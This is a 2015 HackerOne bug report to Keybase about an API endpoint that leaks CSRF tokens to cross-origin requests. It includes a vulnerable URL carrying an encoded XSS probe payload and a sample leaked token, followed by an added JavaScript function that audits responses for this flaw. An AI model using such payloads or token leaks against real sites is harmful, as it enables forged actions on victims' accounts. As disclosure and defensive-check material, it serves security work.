Keybase: Stealing CSRF Tokens

2015-07-20T20:20:11
ID H1:77065
Type hackerone
Reporter akhil-reni
Modified 2015-07-22T20:45:48

Description

Hello,

I see that you allow cross-origin requests in the API, but you leak CSRF on every invalid request.

Vulnerable URL:

https://keybase.io/_/api/1.0/user/lookup.json?usernames=test%22%3E%3Cimg%20src=x%20onerror=prompt%281%29%3E

Response

xyz.... "csrf_token":"lgHZIDVjN2RiOGNiZjNhZjkxYzRjYTgzMjI3MmJmY2Q1ZTA4zlWtVxXOAAFRgMDEIPn2lkhARPmRDF5dcdo+u+y+DyNuLvCZsk6wbWih8i8a"}

POC is attached.

Regards, Wesecureapp
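
A defensive check for the condition the report describes, as an added example that is not part of the original report or Keybase's code: it flags a JSON response that both carries a `csrf_token` field and is readable by another origin under CORS. The function names, result labels and any origins or header values passed in are assumptions for illustration; the report does not state which CORS headers the API sent.

```javascript
// Added example (not from the report): audit one HTTP response for a CSRF
// token that a foreign origin's script could read through CORS.
// "csrf_token" is the field name shown in the report; everything else here
// (function names, result labels) is hypothetical.

// Recursively look for a non-empty string field named "csrf_token".
function findCsrfToken(value) {
  if (value === null || typeof value !== 'object') return false;
  for (const [key, child] of Object.entries(value)) {
    if (key === 'csrf_token' && typeof child === 'string' && child.length > 0) return true;
    if (findCsrfToken(child)) return true;
  }
  return false;
}

// Decide whether a browser would let a script on `requestOrigin` read the body.
function readableCrossOrigin(requestOrigin, headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();
  const acao = h['access-control-allow-origin'];
  if (!acao) return { readable: false, credentialed: false };
  // Browsers refuse "*" for credentialed requests, so a wildcard only
  // exposes the response to requests sent without cookies.
  if (acao === '*') return { readable: true, credentialed: false };
  const match = acao === requestOrigin;
  const creds = h['access-control-allow-credentials'] === 'true';
  return { readable: match, credentialed: match && creds };
}

// Returns 'no-finding', 'token-readable-anonymous' or 'token-readable-with-cookies'.
function auditResponse(requestOrigin, headers, bodyText) {
  let body;
  try {
    body = JSON.parse(bodyText);
  } catch {
    return 'no-finding'; // not JSON, so no token field to look for
  }
  if (!findCsrfToken(body)) return 'no-finding';
  const { readable, credentialed } = readableCrossOrigin(requestOrigin, headers);
  if (!readable) return 'no-finding';
  return credentialed ? 'token-readable-with-cookies' : 'token-readable-anonymous';
}
```

Run it over error responses as well as successful ones, since the report's point is that the token appears on invalid requests; the fix it points to is leaving the token out of any body served with permissive CORS headers.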